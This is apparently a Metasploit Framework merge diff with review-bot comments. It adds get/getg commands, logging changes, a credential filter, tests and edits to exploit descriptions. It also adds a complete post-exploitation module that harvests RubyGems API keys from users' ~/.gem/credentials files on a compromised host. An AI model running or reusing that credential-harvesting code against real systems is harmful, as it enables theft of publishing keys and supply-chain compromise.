Merge remote-tracking branch 'upstream/master' into bug/4634/blank-username

Conflicts:
	lib/msf/ui/console/command_dispatcher/db.rb
	spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
bug/bundler_fix
James Lee 2015-01-27 08:40:07 -06:00
commit eac7b11a87
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
34 changed files with 452 additions and 135 deletions


@ -19,6 +19,8 @@ Feature: Help command
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a variable
getg Gets the value of a global variable
go_pro Launch Metasploit web GUI
grep Grep the output of another command
help Help menu


@ -151,19 +151,17 @@ protected
rescue ::Exception => e
mod.error = e
mod.print_error("Auxiliary failed: #{e.class} #{e}")
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.auxiliary.rb/
mod.print_error(" #{line}")
end
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
end
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
mod.cleanup
return
@ -184,3 +182,4 @@ end
end
end
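Review bot: The guard `if(e.class.to_s != 'Msf::OptionValidateError')` compares the class name as a string, so a subclass of `Msf::OptionValidateError` would still have its call stack printed to the user; `unless e.kind_of?(Msf::OptionValidateError)` covers the whole hierarchy. The page has lost its +/- markers, so this assumes the string-comparison line is the new side, which the hunk's 19-to-17 line count suggests. The same comparison appears in the Post hunk (`-121,19 +121,17`) and in the console Auxiliary, Exploit and Post dispatcher hunks. The rescue clause belongs to a block that starts above the hunk.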


@ -147,17 +147,7 @@ module Exploit
exploit.error = e
exploit.print_error("Exploit failed: #{e}")
elog("Exploit failed (#{exploit.refname}): #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
exploit.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.exploit.rb/
exploit.print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
end
return driver.session if driver
@ -209,3 +199,4 @@ end
end
end
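Review bot: After this hunk the rescue path records only `elog("Exploit failed (#{exploit.refname}): #{e}", 'core', LEV_0)`, so a failure here leaves no call stack in the log at any level. The ten lines that wrote the backtrace appear to be removed (the hunk shrinks from 17 to 7 lines) and nothing replaces them. Keeping one debug-level line, `dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)`, would match what the Auxiliary and Post handlers on this page appear to log. The enclosing method begins and ends outside the hunk.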


@ -121,19 +121,17 @@ protected
rescue ::Exception => e
mod.error = e
mod.print_error("Post failed: #{e.class} #{e}")
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.post.rb/
mod.print_error(" #{line}")
end
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
end
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
mod.cleanup
return
@ -156,3 +154,4 @@ end
end
end


@ -271,20 +271,14 @@ protected
exploit.fail_reason = Msf::Exploit::Failure::Unknown
end
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
if exploit.fail_reason == Msf::Exploit::Failure::Unknown
exploit.print_error("Exploit failed: #{msg}")
exploit.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.core.exploit_driver.rb/
exploit.print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
else
exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
end
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
end
# Record the error to various places
@ -335,3 +329,4 @@ protected
end
end


@ -15,6 +15,11 @@ class RPC_Core < RPC_Base
self.service.stop
end
def rpc_getg(var)
val = framework.datastore[var]
{ var.to_s => val.to_s }
end
def rpc_setg(var, val)
framework.datastore[var] = val
{ "result" => "success" }
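Review bot: `rpc_getg` is added without a comment block, and its contract is not obvious from the signature: the reply is a one-entry hash keyed by `var.to_s`, and an unset option comes back as `''` because `val.to_s` is applied to nil, so unset and empty are indistinguishable to the caller. I would add a short YARD block above the `def` giving the parameter, the `{ name => value }` return shape and the empty-string case. That block should also state that the global datastore can hold credentials placed there with `setg`, which this method returns to whichever RPC client is allowed to call it. `rpc_setg` continues past the end of the hunk.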


@ -120,17 +120,12 @@ class Auxiliary
print_error("Auxiliary interrupted by the console user")
rescue ::Exception => e
print_error("Auxiliary failed: #{e.class} #{e}")
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
return false
@ -157,3 +152,4 @@ class Auxiliary
end
end end end end


@ -115,6 +115,8 @@ class Core
"color" => "Toggle color",
"exit" => "Exit the console",
"edit" => "Edit the current module with $VISUAL or $EDITOR",
"get" => "Gets the value of a variable",
"getg" => "Gets the value of a global variable",
"go_pro" => "Launch Metasploit web GUI",
"grep" => "Grep the output of another command",
"help" => "Help menu",
@ -2298,6 +2300,81 @@ class Core
return tabs
end
def cmd_get_help
print_line "Usage: get var1 [var2 ...]"
print_line
print_line "The get command is used to get the value of one or more variables."
print_line
end
#
# Gets a value if it's been set.
#
def cmd_get(*args)
# Figure out if these are global variables
global = false
if (args[0] == '-g')
args.shift
global = true
end
# No arguments? No cookie.
if args.empty?
global ? cmd_getg_help : cmd_get_help
return false
end
# Determine which data store we're operating on
if (active_module && !global)
datastore = active_module.datastore
else
datastore = framework.datastore
end
args.each { |var| print_line("#{var} => #{datastore[var]}") }
end
#
# Tab completion for the get command
#
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_get_tabs(str, words)
datastore = active_module ? active_module.datastore : self.framework.datastore
datastore.keys
end
def cmd_getg_help
print_line "Usage: getg var1 [var2 ...]"
print_line
print_line "Exactly like get -g, get global variables"
print_line
end
#
# Gets variables in the global data store.
#
def cmd_getg(*args)
args.unshift('-g')
cmd_get(*args)
end
#
# Tab completion for the getg command
#
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_getg_tabs(str, words)
self.framework.datastore.keys
end
def cmd_unset_help
print_line "Usage: unset [-g] var1 var2 var3 ..."
print_line
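Review bot: `cmd_get_tabs` ignores its `words` argument, so `get -g <tab>` with a module loaded completes from the module datastore while `cmd_get` then reads `framework.datastore`. Selecting the store the same way `cmd_get` does removes the mismatch: `datastore = (active_module && !words.include?('-g')) ? active_module.datastore : framework.datastore`. The YARD comments on both `_tabs` methods describe the parameters but have no `@return` line; `# @return [Array<String>] the datastore keys offered as completions` would complete them.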


@ -887,6 +887,16 @@ class Db
query.find_each do |core|
# Exclude non-blank username creds if that's what we're after
if user && user.empty? && !(core.public && core.public.username.blank?)
next
end
# Exclude non-blank password creds if that's what we're after
if pass && pass.empty? && !(core.private && core.private.data.blank?)
next
end
if core.logins.empty?
tbl << [
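Review bot: The blank-username filter `!(core.public && core.public.username.blank?)` also skips a core whose `public` is nil, so a credential stored with no public at all is not listed when the user filter is the empty string; the password filter does the same for a nil `core.private`. Whether such cores should count as blank cannot be told from the hunk. If they should, the condition would read `next if user && user.empty? && core.public && !core.public.username.blank?`, with the equivalent for `pass`. If they should not, a one-line comment saying that nil publics and privates are excluded on purpose would save the next reader the question. The `find_each` block starts in the hunk and continues past its end.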


@ -121,18 +121,12 @@ class Exploit
raise $!
rescue ::Exception => e
print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
elog("Exploit exception (#{mod.refname}): #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
end


@ -122,18 +122,12 @@ class Post
print_error("Post interrupted by the console user")
rescue ::Exception => e
print_error("Post failed: #{e.class} #{e}")
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if (e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
return false
@ -160,3 +154,4 @@ class Post
end
end end end end


@ -55,16 +55,16 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an un-authenticated information disclosure vulnerability in Huawei
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure including any stored SMS.
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jimson K James.',
'<tomsmaily[at]aczire.com>', # Msf module
'Jimson K James',
'Tom James <tomsmaily[at]aczire.com>', # Msf module
],
'References' =>
[


@ -14,10 +14,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q(
'Description' => %q{
This module will extract FTP and SMB account usernames and passwords
from Konica Minolta mfp devices. Tested models include: C224, C280,
283, C353, C360, 363, 420, C452,C452, C452, C454e, C554 ),
from Konica Minolta multifunction printer (MFP) devices. Tested models include
C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
},
'Author' =>
[
'Deral "Percentx" Heiland',


@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher at that (ECB). By default,
if installed with a local SQL Server instance, the SQL server is listening on all interfaces.
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has no changed the password for the initially created account since installation,
the attacker also now has the password for this account. By default, 'admin' is recommended.
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Any user account can be used to exploit this, all that is needed is a pair of credentials.
Any user account can be used to exploit this, all that is needed is a valid credential.
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.


@ -19,7 +19,7 @@ class Metasploit4 < Msf::Auxiliary
'Misfortune Cookie' vulnerability which affects Allegro Software
Rompager versions before 4.34 and can allow attackers to authenticate
to the HTTP service as an administrator without providing valid
credentials, however more specifics are not yet known.
credentials.
),
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM) 10 does not properly implement access control, which allows remote attackers to
modify user information. This module exploits the vulnerability for configure unauthorized
modify user information. This module exploits the vulnerability to configure unauthorized
call forwarding.
},
'Author' => 'fozavci',


@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM), before version 10, doesn't implement access control properly, which allows remote
attackers to modify user information. This module exploits the vulnerability to make
unauthorized speeddial manipulations.
unauthorized speeddial entity manipulations.
},
'Author' => 'fozavci',
'References' =>


@ -20,11 +20,11 @@ class Metasploit4 < Msf::Exploit::Local
'Description' => %q{
This module steals the user password of an administrative user on a desktop Linux system
when it is entered for unlocking the screen or for doing administrative actions using
policykit. Then it escalates to root privileges using sudo and the stolen user password.
PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.
It exploits the design weakness that there is no trusted channel for transferring the
password from the keyboard to the actual password verificatition against the shadow file
(which is running as root since /etc/shadow is only readable to the root user). Both
screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under
the current user account to query for the password and then pass it to a setuid-root binary
to do the password verification. Therefore, it is possible to inject a password stealer
after compromising the user account. Since sudo requires only the user password (and not


@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
to the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.
For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been


@ -13,9 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Name' => "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
upload which allows a user to upload arbitrary files to the '/images/' directory.


@ -15,17 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(
info,
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
'Description' => %q{WP Symposium Plugin for WordPress contains a
flaw that allows a remote attacker to execute
arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script
does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the
web server.},
'Description' => %q{
WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker
to execute arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script does not properly verify or
sanitize user-uploaded files. By uploading a .php file, the remote system will
place the file in a user-accessible path. Making a direct request to the
uploaded file will allow the attacker to execute the script with the privileges
of the web server.
},
'License' => MSF_LICENSE,
'Author' =>
[


@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on


@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on


@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
i-Ftp v2.20, caused by a long time value set for scheduled download.
By persuading the victim to place a specially-crafted Schedule.xml file
in the i-FTP folder, a remote attacker could execute arbitrary code on
the system or cause the application to crash. This module has been


@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.
A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated
attacker to upload arbitrary files, including arbitrary JSP code. This module has been
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
},


@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is Windows 7 friendly.
Up directory used by the module is present on Windows 7.
},
'Author' =>
[


@ -24,7 +24,7 @@ module Metasploit3
'Description' => 'Listen for a connection. First, the port will need to be knocked from
the IP defined in KHOST. This IP will work as an authentication method
(you can spoof it with tools like hping). After that you could get your
shellcode from any IP. The socket will appear as "closed" helping us to
shellcode from any IP. The socket will appear as "closed," thus helping to
hide the shellcode',
'Author' =>
[


@ -21,7 +21,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Hidden Bind TCP Stager',
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host',
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host.',
'Author' =>
[
'hdm', # original payload module (stager bind_tcp)


@ -0,0 +1,67 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'yaml'
class Metasploit4 < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'Multi Gather RubyGems API Key',
'Description' => %q{
This module obtains a user's RubyGems API key from ~/.gem/credentials.
},
'Author' => [
'Jonathan Claudius <jclaudius[at]trustwave.com>',
'Brandon Myers <bmyers[at]trustwave.com>'
],
'Platform' => %w{bsd linux osx unix},
'SessionTypes' => %w{shell},
'License' => MSF_LICENSE
))
end
def run
print_status('Finding ~/.gem/credentials')
paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
paths = paths.select { |f| file?(f) }
if paths.empty?
print_error('No users found with a ~/.gem/credentials file')
return
end
download_key(paths)
end
def download_key(paths)
print_status("Looting #{paths.count} files")
paths.each do |path|
path.chomp!
next if ['.', '..'].include?(path)
rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
next unless rubygems_api_key
print_good("Found a RubyGems API key: #{rubygems_api_key}")
loot_path = store_loot(
'rubygems.apikey',
'text/plain',
session,
rubygems_api_key,
'rubygems_api_key.txt',
'RubyGems API key'
)
print_good("RubyGems API key stored in #{loot_path}")
end
end
end
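Review bot: `YAML.load(read_file(path))` in `download_key` parses a file fetched from the remote host inside the framework process, and on Psych versions where `YAML.load` is not the safe loader it can instantiate arbitrary Ruby objects; the content is controlled by whoever owns that host and should be treated as untrusted. `YAML.safe_load` with only `Symbol` permitted is enough for the `:rubygems_api_key` lookup: `creds = YAML.safe_load(read_file(path), permitted_classes: [Symbol])` (older Psych releases take the class list as the second positional argument). A file that is empty or does not hold a mapping makes the `[:rubygems_api_key]` lookup raise and ends the loop for the remaining paths, so `next unless creds.is_a?(Hash)` belongs before it.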


@ -0,0 +1,28 @@
# -*- coding:binary -*-
require 'spec_helper'
require 'msf/core/rpc/v10/rpc_base'
require 'msf/core/rpc/v10/rpc_core'
require 'msf/core/rpc/v10/service'
describe Msf::RPC::RPC_Core do
include_context 'Msf::Simple::Framework'
let(:service) do
Msf::RPC::Service.new(framework)
end
let(:core) do
Msf::RPC::RPC_Core.new(service)
end
describe '#rpc_getg' do
it 'should show an empty value if the variable is unset' do
expect(core.rpc_getg('FOO')).to eq({'FOO' => ''})
end
it 'should show the correct value if the variable is set' do
core.rpc_setg('FOO', 'BAR')
expect(core.rpc_getg('FOO')).to eq({'FOO' => 'BAR'})
end
end
end


@ -95,4 +95,72 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
end
end
end
it { is_expected.to respond_to :cmd_get }
it { is_expected.to respond_to :cmd_getg }
def set_and_test_variable(name, framework_value, module_value, framework_re, module_re)
# set the current module
allow(core).to receive(:active_module).and_return(mod)
# always assume set variables validate (largely irrelevant because ours are random)
allow(driver).to receive(:on_variable_set).and_return(true)
# the specified global value
core.cmd_setg(name, framework_value) if framework_value
# set the specified local value
core.cmd_set(name, module_value) if module_value
# test the global value if specified
if framework_re
@output = []
core.cmd_getg(name)
@output.join.should =~ framework_re
end
# test the local value if specified
if module_re
@output = []
core.cmd_get(name)
@output.join.should =~ module_re
end
end
describe "#cmd_get and #cmd_getg" do
describe "without arguments" do
it "should show the correct help message" do
core.cmd_get
@output.join.should =~ /Usage: get /
@output = []
core.cmd_getg
@output.join.should =~ /Usage: getg /
end
end
describe "with arguments" do
let(:name) { ::Rex::Text.rand_text_alpha(10).upcase }
context "with an active module" do
let(:mod) do
mod = ::Msf::Module.new
mod.send(:initialize, {})
mod
end
it "should show no value if not set in the framework or module" do
set_and_test_variable(name, nil, nil, /^#{name} => $/, /^#{name} => $/)
end
it "should show the correct value when only the module has this variable" do
set_and_test_variable(name, nil, 'MODULE', /^#{name} => $/, /^#{name} => MODULE$/)
end
it "should show the correct value when only the framework has this variable" do
set_and_test_variable(name, 'FRAMEWORK', nil, /^#{name} => FRAMEWORK$/, /^#{name} => $/)
end
it "should show the correct value when both the module and the framework have this variable" do
set_and_test_variable(name, 'FRAMEWORK', 'MODULE', /^#{name} => FRAMEWORK$/, /^#{name} => MODULE$/)
end
end
end
end
end


@ -65,8 +65,134 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
it { is_expected.to respond_to :set_rhosts_from_addrs }
describe "#cmd_creds" do
let(:username) { "username" }
let(:password) { "password" }
let(:username) { "thisuser" }
let(:password) { "thispass" }
describe "-u" do
let(:nomatch_username) { "thatuser" }
let(:nomatch_password) { "thatpass" }
let(:blank_username) { "" }
let(:blank_password) { "" }
let(:nonblank_username) { "nonblank_user" }
let(:nonblank_password) { "nonblank_pass" }
before(:each) do
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: nil,
workspace: framework.db.workspace)
nonblank_priv = FactoryGirl.create(:metasploit_credential_password, data: nonblank_password)
blank_pub = FactoryGirl.create(:metasploit_credential_blank_username)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: nonblank_priv,
public: blank_pub,
realm: nil,
workspace: framework.db.workspace)
nonblank_pub = FactoryGirl.create(:metasploit_credential_username, username: nonblank_username)
blank_priv = FactoryGirl.create(:metasploit_credential_password, data: blank_password)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: blank_priv,
public: nonblank_pub,
realm: nil,
workspace: framework.db.workspace)
end
context "when the credential is present" do
it "should show a user that matches the given expression" do
db.cmd_creds("-u", username)
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" thisuser thispass Password",
]
end
it 'should match a regular expression' do
subject.cmd_creds("-u", "^#{username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" thisuser thispass Password",
]
end
it 'should return nothing for a non-matching regular expression' do
subject.cmd_creds("-u", "^#{nomatch_username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
]
end
context "and when the username is blank" do
it "should show a user that matches the given expression" do
db.cmd_creds("-u", blank_username )
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" nonblank_pass Password"
]
end
end
context "and when the password is blank" do
it "should show a user that matches the given expression" do
db.cmd_creds("-P", blank_password )
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" nonblank_user Password"
]
end
end
end
context "when the credential is absent" do
context "due to a nonmatching username" do
it "should return a blank set" do
db.cmd_creds("-u", nomatch_username)
@output.should =~ [
"===========",
"Credentials",
"",
"---- ------- ------ ------- ----- ------------",
"host service public private realm private_type"
]
end
end
context "due to a nonmatching password" do
it "should return a blank set" do
db.cmd_creds("-P", nomatch_password)
@output.should =~ [
"===========",
"Credentials",
"",
"---- ------- ------ ------- ----- ------------",
"host service public private realm private_type"
]
end
end
end
end
describe "add-password" do
context "when no core exists" do
@ -94,44 +220,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
end
end
end
describe "-u" do
before(:each) do
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
FactoryGirl.create(:metasploit_credential_core,
private: priv,
public: pub,
realm: nil,
workspace: framework.db.workspace)
end
it 'should match a regular expression' do
subject.cmd_creds("-u", "^#{username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" username password Password",
]
end
it 'should return nothing for a non-matching regular expression' do
subject.cmd_creds("-u", "^$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
]
end
end
end
describe "#cmd_db_export" do